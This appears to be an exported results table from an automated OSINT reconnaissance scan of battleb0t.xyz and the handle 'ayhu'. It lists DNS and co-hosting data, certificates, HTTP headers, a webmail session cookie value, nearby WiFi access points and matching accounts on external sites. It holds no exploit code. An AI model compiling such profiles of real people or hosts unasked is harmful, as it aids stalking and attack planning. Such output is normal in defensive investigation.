| Date Found | Type | Risky Data Type | Module | Children | Correlations | Distance | Starred | Annotation | Data | Source Data |
|---|
| 2023-05-12 02:53:17 | IPv6 Address | No | Mnemonic PassiveDNS | 16 | 0 | 1 | 0 | None | 2a06:98c1:3121::1 | ayhu.xyz |
| 2023-05-12 03:09:08 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.95 | 165.232.113.85 |
| 2023-05-12 02:55:01 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T01:28:39.865Z", "ip": "188.114.96.1", "location_updated_at": "2023-04-29T20:40:06.346917Z", "autonomous_system_updated_at": "2023-04-29T20:40:06.346970Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"landing.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-15T13:31:47.102980654Z"}, "noitafile-proxy.zuibaqi.com": {"record_type": "A", "resolved_at": "2023-05-09T16:21:18.328899036Z"}, "smtp.sharoshop.com": {"record_type": "A", "resolved_at": "2022-10-23T14:06:43.660097027Z"}, "www.test4-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-25T12:35:31.168490324Z"}, "ssl4.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-02-02T00:27:29.175252329Z"}, "pop.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-18T13:44:12.923874025Z"}, "939394.xyz": {"record_type": "A", "resolved_at": "2023-03-24T21:43:29.035929030Z"}, "api.939394.cn": {"record_type": "A", "resolved_at": "2022-12-30T12:33:15.088861766Z"}, "finalsfootyfantasy.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:32.701218324Z"}, "www.shop.charkhak.ir": {"record_type": "A", "resolved_at": "2022-10-14T15:11:46.056786726Z"}, "enter.agpsdo.edu.ru": {"record_type": "A", "resolved_at": "2023-04-13T20:07:14.050231893Z"}, "paradshop.ir": {"record_type": "A", "resolved_at": "2022-11-18T14:16:06.009427234Z"}, "test4-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-28T12:30:46.414407007Z"}, "abcbourse.ir": {"record_type": "A", "resolved_at": "2022-10-25T15:12:33.856179812Z"}, "beautybeyondhair.net": {"record_type": "A", "resolved_at": "2023-03-30T19:32:04.069794297Z"}, "ssl.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-30T15:42:14.364581488Z"}, "demo.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-24T14:59:01.147426415Z"}, "lt.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-24T13:34:44.275517531Z"}, "mybots.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-12-02T15:15:41.628857633Z"}, "karriere-job-booster.at": {"record_type": "A", "resolved_at": "2023-04-12T21:48:57.147456694Z"}, "odenneszolaca.cf": {"record_type": "A", "resolved_at": "2023-02-17T02:27:33.470439994Z"}, "karriere-job-booster.com": {"record_type": "A", "resolved_at": "2023-04-22T14:40:02.799652037Z"}, "uncoveryourconfidence.org": {"record_type": "A", "resolved_at": "2023-05-01T20:11:56.835607536Z"}, "ssl5.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-19T12:26:12.193299619Z"}, "www.barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-14T14:46:07.712552308Z"}, "metako.kz": {"record_type": "A", "resolved_at": "2023-04-26T19:09:17.996870996Z"}, "edu.rabinia.com": {"record_type": "A", "resolved_at": "2022-10-25T13:57:12.441109542Z"}, "www.13709394.net": {"record_type": "A", "resolved_at": "2023-04-25T18:56:56.576355949Z"}, "www.test6-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-03-17T12:46:14.887012316Z"}, "dl.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-26T15:24:28.844795223Z"}, "dornikasafir.de": {"record_type": "A", "resolved_at": "2022-10-02T14:08:30.967547568Z"}, "www.fakherturkman.com": {"record_type": "A", "resolved_at": "2022-11-07T13:24:27.903118674Z"}, "www.barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-10-10T14:59:00.508858938Z"}, "www.test5-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-12-25T12:33:32.915967721Z"}, "password.moeking.me": {"record_type": "A", "resolved_at": "2022-09-25T16:38:19.046997106Z"}, "mail.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "fi.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-05-01T14:32:55.216085423Z"}, "www.133335.xyz": {"record_type": "A", "resolved_at": "2022-09-25T19:02:08.754559807Z"}, "wolny.poker": {"record_type": "A", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "moeking.me": {"record_type": "A", "resolved_at": "2022-09-30T15:32:44.686639976Z"}, "download.8t.cx": {"record_type": "A", "resolved_at": "2023-02-24T17:37:07.782880370Z"}, "test2-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-11-27T12:26:47.852803846Z"}, "133335.xyz": {"record_type": "A", "resolved_at": "2022-10-05T17:45:47.967622672Z"}, "www.clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-04-18T20:54:02.995698546Z"}, "mail.mardinscarf.com": {"record_type": "A", "resolved_at": "2022-11-01T13:38:25.278618273Z"}, "sub.133335.xyz": {"record_type": "A", "resolved_at": "2022-10-03T20:37:50.410080500Z"}, "web3rh.tk": {"record_type": "A", "resolved_at": "2023-02-20T04:15:37.204816270Z"}, "megafrica.ao": {"record_type": "A", "resolved_at": "2022-10-02T12:04:18.005028285Z"}, "ftp.baharelm.ir": {"record_type": "A", "resolved_at": "2023-01-11T15:16:43.150193914Z"}, "ses.co.ir": {"record_type": "A", "resolved_at": "2022-10-03T15:24:37.474565747Z"}, "test1-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-12-05T12:32:16.018654402Z"}, "www.tootanro.com": {"record_type": "A", "resolved_at": "2022-10-24T14:06:17.503873544Z"}, "www.metako.kz": {"record_type": "A", "resolved_at": "2023-05-05T17:41:02.011446152Z"}, "nordjyskgraesslaaning.dk": {"record_type": "A", "resolved_at": "2023-01-19T00:51:09.365049648Z"}, "33t.life": {"record_type": "A", "resolved_at": "2022-12-15T15:20:29.852611959Z"}, "app.myhealthpointe.no": {"record_type": "A", "resolved_at": "2022-10-01T15:32:46.256381743Z"}, "www.939394.xyz": {"record_type": "A", "resolved_at": "2023-03-04T19:54:36.565190153Z"}, "oscord.net": {"record_type": "A", "resolved_at": "2023-05-07T20:04:57.891682634Z"}, "mail.bokharsanat.com": {"record_type": "A", "resolved_at": "2023-04-28T14:34:55.423339504Z"}, "agpsdo.edu.ru": {"record_type": "A", "resolved_at": "2023-04-26T22:14:12.681023418Z"}, "www.ostrovok.net": {"record_type": "A", "resolved_at": "2023-05-07T20:05:01.309575808Z"}, "test6-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-29T12:35:27.340588919Z"}, "mail.lskala.com": {"record_type": "A", "resolved_at": "2023-01-21T13:35:04.083346865Z"}, "mytampered.golf": {"record_type": "A", "resolved_at": "2022-12-22T14:42:39.165034528Z"}, "www.test1-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-11-27T12:26:47.811643407Z"}, "assistant.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-11-15T19:04:22.316842630Z"}, "beautybeyondhair.buzz": {"record_type": "A", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "athletichouseacademic.com": {"record_type": "A", "resolved_at": "2023-04-18T11:24:30.935186784Z"}, "www.rbtradinggroup.com": {"record_type": "A", "resolved_at": "2022-10-24T13:49:09.818009144Z"}, "hola.organizoo.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:38.886997403Z"}, "ritta.app": {"record_type": "A", "resolved_at": "2023-04-20T12:15:33.428852719Z"}, "xnllarblack.art": {"record_type": "A", "resolved_at": "2023-04-21T20:37:36.441653637Z"}, "barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-11-07T14:46:42.708236475Z"}, "oytunjivillage.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:58.523823601Z"}, "www.sanayepishro.com": {"record_type": "A", "resolved_at": "2022-10-23T11:24:26.165823422Z"}, "total-ev-charge.com": {"record_type": "A", "resolved_at": "2023-04-10T16:35:40.386710867Z"}, "panel.moeking.me": {"record_type": "A", "resolved_at": "2022-09-28T16:39:39.161526355Z"}, "barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-15T14:22:57.320001219Z"}, "www.bobo8090.com": {"record_type": "A", "resolved_at": "2023-02-10T13:15:31.285424987Z"}, "persaldo-treuhand.ch": {"record_type": "A", "resolved_at": "2023-01-07T12:29:30.392242949Z"}, "pic.939394.cn": {"record_type": "A", "resolved_at": "2022-12-31T12:38:06.391476974Z"}, "www.otherend.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:39.580563012Z"}, "clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-05-07T21:19:52.237134340Z"}, "e-management.lv": {"record_type": "A", "resolved_at": "2023-05-10T17:58:43.673701872Z"}, "bezi386.xyz": {"record_type": "A", "resolved_at": "2023-03-16T01:18:53.784985236Z"}, "inthemachine.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:39.481058126Z"}, "www.athletichouseacademic.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T13:49:15.422177239Z"}, "sign.moeking.me": {"record_type": "A", "resolved_at": "2022-09-28T16:39:39.465293148Z"}, "www.abcbourse.ir": {"record_type": "A", "resolved_at": "2022-10-20T15:09:44.156091370Z"}, "ftp.netrobotic.ir": {"record_type": "A", "resolved_at": "2023-04-04T18:41:04.300955582Z"}, "de.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-04-28T15:19:37.298278045Z"}, "test5-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-11T12:32:24.608221922Z"}, "diacounneirepuhar.ml": {"record_type": "A", "resolved_at": "2023-02-18T02:32:50.074200205Z"}, "api.snoor.shop": {"record_type": "A", "resolved_at": "2022-11-22T01:28:36.076229399Z"}, "www.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "www.test2-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-11-27T12:26:47.902936535Z"}}, "names": ["wolny.poker", "athletichouseacademic.com", "e-management.lv", "www.test4-pointg.nc-testdomain2.club", "noitafile-proxy.zuibaqi.com", "www.clinic.tanyar.org", "megafrica.ao", "sub.133335.xyz", "www.test6-pointg.nc-testdomain2.club", "demo.jamalghamari.com", "enter.agpsdo.edu.ru", "www.13709394.net", "mytampered.golf", "total-ev-charge.com", "dl.jamalghamari.com", "inthemachine.com.au", "lt.makingprojec.com", "www.wolny.poker", "barbecue-masters.dk", "app.myhealthpointe.no", "ses.co.ir", "beautybeyondhair.buzz", "ssl5.nc-testdomain2.club", "www.shop.charkhak.ir", "www.metako.kz", "bezi386.xyz", "barbecuemasters.dk", "nordjyskgraesslaaning.dk", "www.133335.xyz", "test1-pointg.nc-testdomain2.club", "133335.xyz", "ap | 188.114.96.1 |
| 2023-05-12 03:33:52 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif
8Photoshop 3.0
mntrRGB XYZ
acspAPPL
-appl
0cprt
Pwtpt
chad
gTRC
mluc
3mluc
2XYZ
5CrOZpRG?
rE8d0'8
hl1b1
GJ2W<
zkHdm
J\pwt
P49$v
O.D.>
Kn8lR
2N001
OpXSw
1r0zb
H@?6>
Oe!Cg'
H8?J '
>\aO4
z98brzQ
AP0Gzz
?n@Rq
"d!8?
ixnGn8
lSr:w
nAcJ3
GoZg
E<nNq
sGpXt
NGjTD
7OOZR
!$pGZs
R>oJ
3pzTy
Jv 8<c
60??JX
<t5 <
zzSYA`G
NE\m
PCu5.A
'4aKp
Z@Nzd
?JL.>f
Fp9?Zv
W!NiH
.Fpy
wjaq9
Tl em
SHp8n
J@7.I9
Ip2zs
zx?6
RJ7'9
rO85/
7OOSM
JFI$n
<coz\
E<d1`8
?7_J:
zdsFGZ
M8p9<
OcHWw
!FOZj
iUW$w
JOBFir1
@8cns
pVV!O
f?7nq@
h- R6q
Uo1pFq
!8<.GJ
:Tch t
zR>aQ rA
\`rO?
d7JBX/
J:mpI
q@99'
R0E7p$
8cRm`
cm?n@
`YppqG
946p:`
O!@ r
r?1@1
O8nFzw
iBG_Zj
ORE' m
vFGqM
SBnn1
NGoaN
pNO4 | https://funny.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Playstation Network (Category: gaming)
https://psnprofiles.com/xhr/search/users?q=ayshoo | ayshoo |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.23): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:19 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000justin000.github.io]
https://www.openphish.com/feed.txt | 000justin000.github.io |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Powered_By": "DISPLAY_UTF8", "Keep_Alive": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Link": "DISPLAY_UTF8", "Alt_Svc": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "X_Powered_By": ["PHP/7.4.33"], "Keep_Alive": ["timeout=5, max=100"], "Vary": ["Accept-Encoding"], "Server": ["LiteSpeed"], "Connection": ["Keep-Alive"], "Link": ["<https://acilacikveteriner.com/wp-json/>; rel=\"https://api.w.org/\""], "Alt_Svc": ["h3=\":443\"; ma=2592000, h3-29=\":443\"; ma=2592000, h3-Q050=\":443\"; ma=2592000, h3-Q046=\":443\"; ma=2592000, h3-Q043=\":443\"; ma=2592000, quic=\":443\"; ma=2592000; v=\"43,46\""], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"]} | 87.248.157.102 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:03:2F:04:BB:BC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:20 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H06PCVJ4HBKTDMM1V2TTSTEZ"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:10:04 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | cloudflare.com | cdnjs.cloudflare.com |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/ayhu/ | ayhu |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/gallery.css | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PP2104 (Net ID: 00:19:CB:7B:6C:D7) | 40.2024, 29.0398 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "webmailsession=%3ai7RZ7smCZHbrrA3k%2cc6f59b16b1db3e998a7645b6e2984b9e; HttpOnly; path=/; port=2095", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2095", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "roundcube_cookies=enabled; HttpOnly; expires=Fri, 10-May-2024 13:43:03 GMT; path=/; port=2095"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BeensGroep (Net ID: 00:01:21:1C:17:B0) | 52.3759, 4.8975 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | KNOLBEHEER (Net ID: 00:01:24:F0:5F:22) | 52.3759, 4.8975 |
| 2023-05-12 02:50:29 | Physical Address | No | GLEIF | 1 | 0 | 3 | 0 | None | 2155 E. GoDaddy Way, Tempe, US-AZ, US, 85284 | Go Daddy, LLC |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/reveloder.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:56:30 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | Germany, Hesse, Frankfurt am Main | 207.154.228.169 |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 66.170.74.34.bc.googleusercontent.com | 34.74.170.66 |
| 2023-05-12 02:44:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | netlify.app | netlify.app |
| 2023-05-12 02:44:15 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c57adae9fbb90f2-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:34:02 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
m_p Y
0a6-X
h5Zh5b
4L8uS
>m7xY
YGhP5
10IMLR
bc<p0
:"CGlZ
k>04D
A nL/
"KBt:-t
h\dHkQU
2<qC
jg>v\i
AW$@C
V3\/g
:>2'F
WF93l
IDATV
S93lg
`f--p
>m'xY3t`
:'9Pp
.C-Z1
0BL@'x
IgL<S`
b5la-
?sbrH
Bq18x
A92tp
f!34_ 4tk
3F@s.F
y by2
.z23c
:\i_U
0`S7g
0.H@1
VXR/t
DeuLK
L5g0s
o:LGXb
Q3w5c
af`03
3EEito
D:hSE
p6!X3
L<vf:
T>wke
M46@LR
AY5:3
NGqyG
mFEmF
ujL l
s"978b
avEV1
T.f>Bo
`t3@V
jvQ@M9
4:k?u\
a\'c03q
fjAYU
XT7B/
Nt3te
-94tc
TOM'
L<fv?
:1teL?
KeTN3
R1G3@
L2rf:
z94-L
95K95
p_KcW
8-X8eR
4qZ0qR`l
\5Q F
yLSzA'm1
YC5NV
6/F1/z
rRZ21
>ifp3
9CI<c\
Tfx2B
Ql2 l
8rFLV
!Lrlv
Otu43a
k`XjcT
3l9?
_JbXI
Z\qcd3
aF<3L
aDs?cc@uF
\.:8_u
0.WF<5_
0Tfx
H`U?X
7IaSa | https://funny.battleb0t.xyz/images/kappi_1.png |
| 2023-05-12 02:53:56 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8001::/48 | 2606:50c0:8001::153 |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:fd:f2:48:0f:df:bc:e1:99:1b:6f:bd:c7:77:
53:7a:c0:8b:77:cd:2c:3c:60:53:e0:e9:b0:a7:7b:
73:98:97:7e:b8:eb:d6:f1:08:7b:2c:70:98:ff:62:
24:3a:e4:75:75:15:64:3c:f3:10:df:1f:74:86:c2:
03:e3:19:f8:ee:1b:1c:a4:33:45:b3:b5:bd:cc:36:
58:4b:c6:53:5a:e5:a0:83:1c:13:b6:0a:f0:09:85:
49:e2:af:1f:59:f3:45:35:c5:76:d8:d7:03:6b:48:
2d:81:71:8d:d8:b6:9f:ca:3d:be:a5:d1:d0:6d:84:
3f:57:a3:f9:3b:33:48:5e:3a:10:1b:9a:8e:0e:52:
e4:41:61:32:48:9e:eb:dd:91:27:08:98:23:0d:d6:
40:40:46:c6:2e:72:9b:5e:7b:a7:ce:14:5c:e3:33:
d1:e0:7f:e9:bf:c8:04:bf:dd:c3:5b:ec:18:53:dc:
e8:49:50:75:f5:f6:57:2f:90:7f:b7:6a:c4:1e:bc:
3e:2d:04:87:d0:de:ec:72:7e:5e:84:cf:77:05:c4:
81:0d:1d:68:c9:a6:7c:75:bd:ed:fa:cd:4e:88:39:
5c:0c:10:a3:f5:6d:4b:7d:20:b4:0a:24:fb:93:43:
e5:9b:70:b2:e4:95:89:06:02:90:7a:2d:6f:c2:fa:
77:78:2c:13:6f:d6:08:02:00:eb:f1:d0:25:de:0b:
0c:36:d6:0b:0b:8d:58:6f:b7:29:51:a7:c3:27:fb:
ab:fa:3f:bd:88:88:4d:63:79:00:4e:5f:ea:ff:bf:
a7:e5:c8:b9:01:b0:11:55:38:c5:2c:12:42:ec:9f:
41:d5:d8:5b:cb:0e:56:2f:f5:0b:5b:b2:1f:2e:4b:
1c:7b:f3:b8:8f:a3:2a:22:10:32:70:e5:ff:92:c9:
9d:cf:f4:1c:87:80:7b:03:c4:11:f8:c8:fe:1d:fd:
d9:21:53:2a:ab:a4:e1:88:2f:4b:5d:2f:ee:62:ac:
58:24:c3:6b:51:75:98:92:28:85:71:19:cf:1f:32:
bf:04:e0:46:cb:6a:6e:1a:53:77:bb:51:7b:25:a8:
3b:79:a4:fe:31:da:29:cb:94:14:d8:b7:bf:23:48:
40:7c:38:77:e2:71:aa:43:c0:dd:58:a7:d1:0f:28:
19:e1:e9:99:2b:f4:ba:45:c8:6a:f8:d6:7a:86:7e:
a9:1e:96:ed:9c:c8:12:b9:05:83:95:70:08:f4:a3:
69:c3:37:93:d6:82:c5:85:91:d6:07:1b:87:31:af:
f4:29:c3:da:2f:cb:d0:72:02:68:65:19:d7:78:65:
82:75:d2:3a:e3:90:30:94:d9:d7:ad:e9:8d:db:16:
21:a3:69
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:05.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:6A:5D:4C:DD:33:BA:F4:6D:06:CD:62:8E:
62:A6:29:12:73:7E:C4:39:CD:7D:CB:4D:69:0D:6B:E6:
45:D1:49:BA:02:20:62:DC:B1:D6:60:8B:66:25:C3:6B:
92:41:2D:6B:D9:09:69:75:B3:D8:0A:B3:0D:7C:54:94:
66:20:F5:CC:6B:CE
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 10:44:05.107 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:83:1E:C1:82:64:68:53:D0:B4:02:DB:
57:9B:B5:22:1E:9E:35:DC:46:F1:4F:28:01:0D:8C:E2:
45:59:C5:A9:E3:02:21:00:96:C6:99:D6:12:DF:9E:19:
D7:CD:44:66:3D:89:58:9B:65:51:7C:84:99:4A:C9:3C:
8B:FE:37:A8:47:DE:C3:56
Signature Algorithm: sha256WithRSAEncryption
41:96:b5:7d:95:d4:ae:2d:a9:b4:a2:a9:03:e1:6c:2c:ea:0b:
12:67:47:89:ea:84:af:bc:58:df:6e:9e:7a:17:58:2c:fc:ee:
11:c4:75:03:fe:d2:23:80:47:ef:3d:f5:e5:85:f3:73:e7:e9:
a1:39:06:c3:b0:7b:8d:b5:5d:d0:86:03:d3:f0:e2:af:ce:56:
94:97:70:df:5f:13:c2:f2:0c:0e:3f:44:5f:9e:08:77:8b:e6:
63:50:70:6c:63:3d:92:b8:47:22:c8:bb:cb:d9:49:34:87:f7:
e2:00:f1:f4:7c:31:9b:cf:cf:90:32:54:5b:7a:ef:36:94:28:
65:2b:6e:da:99:67:84:fc:a6:85:ec:a5:21:86:4c:1e:b9:bf:
c1:78:0c:7d:6f:7b:a9:50:f0:ef:72:58:32:06:0c:16:de:59:
67:a5:1c:78:dd:a6:2d:3d:28:7f:42:c7:3b:53:0e:90:8f:81:
59:03:3d:d2:aa:47:fb:09:53:87:e3:c8:82:e2:86:64:89:77:
d1:60:50:5c:4a:fa:5f:c3:d3:98:9d:1d:83:27:60:ff:97:a3:
81:ce:78:29:a2:b7:68:63:8d:a5:42:50:56:9e:a6:9b:1c:0b:
e6:30:3b:4d:cb:fe:88:86:0f:0c:9c:8b:ca:5a:30:20:2e:22:
ad:5a:67:9d
|
| 2023-05-12 03:09:16 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 3 | 0 | None | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
